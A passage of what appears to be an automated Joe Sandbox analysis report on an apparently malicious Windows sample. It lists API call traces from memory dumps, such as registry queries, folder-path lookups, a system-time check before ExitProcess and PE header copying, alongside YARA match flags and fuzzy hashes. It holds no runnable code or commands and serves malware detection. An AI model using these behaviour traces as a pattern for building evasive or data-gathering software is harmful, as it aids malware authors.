                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02495E7C
                                                      • Part of subcall function 02495E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02495EAB
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495EDC
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495F04
                                                      • Part of subcall function 02495E47: lstrcat.KERNEL32(00000000,00000000), ref: 02495F0F
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495F37
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$AddressProc$??2@FolderLibraryLoadPathlstrcat
                                                    • String ID:
                                                    • API String ID: 3558977763-0
                                                    • Opcode ID: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
                                                    • Instruction ID: cac4b3e80a399d6e2909ce78946bd407be3a0d67157d6467df3c9362df8eedc4
                                                    • Opcode Fuzzy Hash: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
                                                    • Instruction Fuzzy Hash: 47F14EB1E102058FDF24DF29C944B59BBB2AF88314F19C1AED809AB391D735E946CF91
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024979D7
                                                    • StrCmpCA.SHLWAPI(?,00638C1C), ref: 02497AAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497AE7
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02497B44
                                                      • Part of subcall function 024A74A7: lstrcpy.KERNEL32(00000000), ref: 024A74C1
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02495E7C
                                                      • Part of subcall function 02495E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02495EAB
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495EDC
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495F04
                                                      • Part of subcall function 02495E47: lstrcat.KERNEL32(00000000,00000000), ref: 02495F0F
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495F37
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$FolderPathlstrcat
                                                    • String ID:
                                                    • API String ID: 2938889746-0
                                                    • Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
                                                    • Instruction ID: c7a5e35b297a51813da91198a9d3515cc1b507d91a0480593228f14b9d7ecc75
                                                    • Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
                                                    • Instruction Fuzzy Hash: C9F140B1E112058FDF24DF29C544A59BBB2BF48318F19C1AED809AB3A1D731E942CF91
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024979D7
                                                    • StrCmpCA.SHLWAPI(?,00638C1C), ref: 02497AAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497AE7
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02497B44
                                                    • StrCmpCA.SHLWAPI(?,00638D84), ref: 02497DE4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
                                                    • Instruction ID: a57d25ffa1211b3187f0f042874d5fa21727c15e5a5efcb9fe2ffcf325b40de4
                                                    • Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
                                                    • Instruction Fuzzy Hash: 32F14FB1E112058FDF24DF29C544A59BBB2BF48318F19C1AED809AB3A1D731E942CF91
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024979D7
                                                    • StrCmpCA.SHLWAPI(?,00638D84), ref: 02497DE4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
                                                    • Instruction ID: 0bcf93ae41012bd60d624bcc8c7070f35b92428d6f426736c53fcb714f7a86c0
                                                    • Opcode Fuzzy Hash: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
                                                    • Instruction Fuzzy Hash: 50E14FB1E112058FDF24DF29C544A59BBB2BF48318F19C1AED809AB3A1D771E942CF91
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 02489F6F
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02489FA1
                                                    • StrStrA.SHLWAPI(00000000,004351E8), ref: 02489FCA
                                                    • memcmp.MSVCRT(?,0042DC44,00000005), ref: 0248A003
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocLocallstrcpymemcmp
                                                    • String ID:
                                                    • API String ID: 4154055062-3916222277
                                                    • Opcode ID: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
                                                    • Instruction ID: dd4ba6f17ec627ee16343ab4b9bc7b6072dd0d450d1dcb7a911dd24e694b1d79
                                                    • Opcode Fuzzy Hash: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
                                                    • Instruction Fuzzy Hash: 5F41A271A11695ABCB11FF75CC40AAF7BB6AF46308F04446AED15A7352EBB0A901CF90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CodeInfoPageValidmemset
                                                    • String ID:
                                                    • API String ID: 703783727-0
                                                    • Opcode ID: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
                                                    • Instruction ID: 93a41631035bd71493346f1a2c8f37534416490a291969c7530e4748b17f122e
                                                    • Opcode Fuzzy Hash: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
                                                    • Instruction Fuzzy Hash: 4D312B34A04681CBDB268F35C8A437ABFA09F21314F1849AFD891DF2D2C329C446C761
                                                    APIs
                                                    • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421E28), ref: 00421B52
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
                                                      • Part of subcall function 00421800: lstrlenA.KERNEL32(009254F0,00000000,00000000,?,?,00421B61), ref: 00421840
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
                                                      • Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
                                                      • Part of subcall function 00421800: lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
                                                      • Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
                                                      • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
                                                    • sscanf.NTDLL ref: 00421B7A
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421B96
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BA6
                                                    • ExitProcess.KERNEL32 ref: 00421BC3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                    • String ID:
                                                    • API String ID: 3040284667-0
                                                    • Opcode ID: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
                                                    • Instruction ID: 74431add482d266e5f481d4c3f26529432deb7ac332c40e3c7ddf6828a7bb522
                                                    • Opcode Fuzzy Hash: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
                                                    • Instruction Fuzzy Hash: BD2102B1508301AF8344EF69D88485BBBF9EFD8304F409A1EF5A9C3220E774E5048FA6
                                                    APIs
                                                    • GetSystemTime.KERNEL32(?), ref: 024A1DB9
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A1A96
                                                      • Part of subcall function 024A1A67: lstrlen.KERNEL32(00638DEC), ref: 024A1AA7
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 024A1ACE
                                                      • Part of subcall function 024A1A67: lstrcat.KERNEL32(00000000,00000000), ref: 024A1AD9
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B08
                                                      • Part of subcall function 024A1A67: lstrlen.KERNEL32(00435564), ref: 024A1B1A
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B3B
                                                      • Part of subcall function 024A1A67: lstrcat.KERNEL32(00000000,00435564), ref: 024A1B47
                                                      • Part of subcall function 024A1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B76
                                                    • sscanf.NTDLL ref: 024A1DE1
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 024A1DFD
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 024A1E0D
                                                    • ExitProcess.KERNEL32 ref: 024A1E2A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                    • String ID:
                                                    • API String ID: 3040284667-0
                                                    • Opcode ID: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
                                                    • Instruction ID: 383d642741b2e6cfdb46c79f7a5fddb7a31adb6d60fe8e1287f9a5148525b585
                                                    • Opcode Fuzzy Hash: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
                                                    • Instruction Fuzzy Hash: AB21C3B5518301AF8354DF69D88489FBBFAEED8314F409A1EF599C3220E770D6058FA6
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 024A336D
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A3374
                                                    • RegOpenKeyExA.ADVAPI32(80000002,006389D4,00000000,00020119,?), ref: 024A3393
                                                    • RegQueryValueExA.ADVAPI32(?,00638CEC,00000000,00000000,00000000,000000FF), ref: 024A33AE
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A33B8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3225020163-0
                                                    • Opcode ID: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
                                                    • Instruction ID: 66c31b76347fc70de6d2788668e1249a069cc518ce626c929c35e6e8f65d5c7d
                                                    • Opcode Fuzzy Hash: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
                                                    • Instruction Fuzzy Hash: C8118272A04204AFD714CF94DC45FABBB7DEB48711F00411AFA05D3280DB7459048BE1
                                                    APIs
                                                    • memcpy.MSVCRT(?,?,00000040), ref: 00406E40
                                                    • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00406EBB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heapmemcpy$AllocProcess
                                                    • String ID: @
                                                    • API String ID: 1643994569-2766056989
                                                    • Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                    • Instruction ID: b28c2e2eafd009aece7dfa75dd6d3a6e0d6a1e6899dabcaa8fc792e54f3dbcc7
                                                    • Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                    • Instruction Fuzzy Hash: 9C1161706007129BEB258B61DC84BB773E4EB40701F454439EA47DB684FFB8D950CB99
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 024A2B2C
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2B33
                                                    • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024A2AB0), ref: 024A2B52
                                                    • RegQueryValueExA.ADVAPI32(024A2AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 024A2B6C
                                                    • RegCloseKey.ADVAPI32(024A2AB0), ref: 024A2B76
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3225020163-0
                                                    • Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                    • Instruction ID: 32ee7846072eb4e34ea51eb31f558cd0723c22b0b4d0c875dbf2f9ab49ea5c44
                                                    • Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                    • Instruction Fuzzy Hash: 45019AB5A01318AFE314CFA09C59FEB7BA9AB48755F200099FE4597241EBB059088BA0
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0248127C
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02481283
                                                    • RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024812A0
                                                    • RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024812BA
                                                    • RegCloseKey.ADVAPI32(?), ref: 024812C4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3225020163-0
                                                    • Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                    • Instruction ID: 617edd9044109b51eb6319a5b0a67eef13d4788ef98c32aa3a8631cbce0b14a5
                                                    • Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                    • Instruction Fuzzy Hash: 29F09075A40308BFD7049BA09C4DFEB7B7DEB04755F100059BE09E2280D7B05A048BE0
                                                    APIs
                                                    • __getptd.LIBCMT ref: 024A9274
                                                      • Part of subcall function 024A8A96: __getptd_noexit.LIBCMT ref: 024A8A99
                                                      • Part of subcall function 024A8A96: __amsg_exit.LIBCMT ref: 024A8AA6
                                                    • __getptd.LIBCMT ref: 024A928B
                                                    • __amsg_exit.LIBCMT ref: 024A9299
                                                    • __lock.LIBCMT ref: 024A92A9
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 024A92BD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
                                                    • Instruction ID: c2492feefe95b285cdfe808a8b4f47dde37e3f4195e3e69772883b5496cc167b
                                                    • Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
                                                    • Instruction Fuzzy Hash: 51F0B4339057109BD730BBBA5C21B4E73A1AF20724F10050FE41A6F6C0DB645A409F59
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
                                                    • lstrcpy.KERNEL32(00000000,0094A758), ref: 00423E6F
                                                    • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: lstrcpy$SystemTime
                                                    • String ID: *M@
                                                    • API String ID: 684065273-4186991356
                                                    • Opcode ID: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
                                                    • Instruction ID: b70439790c50c5c6328432dc7e4028cf2044113f60d486d5e56dbf02b5324992
                                                    • Opcode Fuzzy Hash: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
                                                    • Instruction Fuzzy Hash: 76418D31E012158FDB14CF29E984666BBF5FF08315B4A80AAE845DB3A2C779DD42CF94
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417D14
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417D2F
                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,004091B6,?,?,?,?,00000000,?,00001000,?), ref: 00417D84
                                                      • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
                                                      • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
                                                      • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417E11
                                                      • Part of subcall function 00417DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    • API ID: Xinvalid_argumentstd::_$memcpy
                                                    • String ID: string too long
                                                    • API String ID: 2304785028-2556327735
                                                    • Opcode ID: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
                                                    • Instruction ID: cceaebfc163d96aa0f8494b9eac0357faa14b69c3768ea23588e1796d2ee1bc6
                                                    • Opcode Fuzzy Hash: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
                                                    • Instruction Fuzzy Hash: 0F31E5723086148BD7249E6CF880ABBF7F9EF91764B204A2BF14687741D775988183ED
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249F27A
                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0249F295
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0249F2F6
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcpy
                                                    • String ID: ERROR
                                                    • API String ID: 3722407311-2861137601
                                                    • Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
                                                    • Instruction ID: 2ad1568431de74119a56df9bab0ea092f11196ed488d99ffc0d8e38f37009235
                                                    • Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
                                                    • Instruction Fuzzy Hash: FC213E706211D66BCB25FF7ACC44B9E3BE5AF04308F00442AE809DBA01EB75D845CB90
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00408767
                                                      • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                      • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
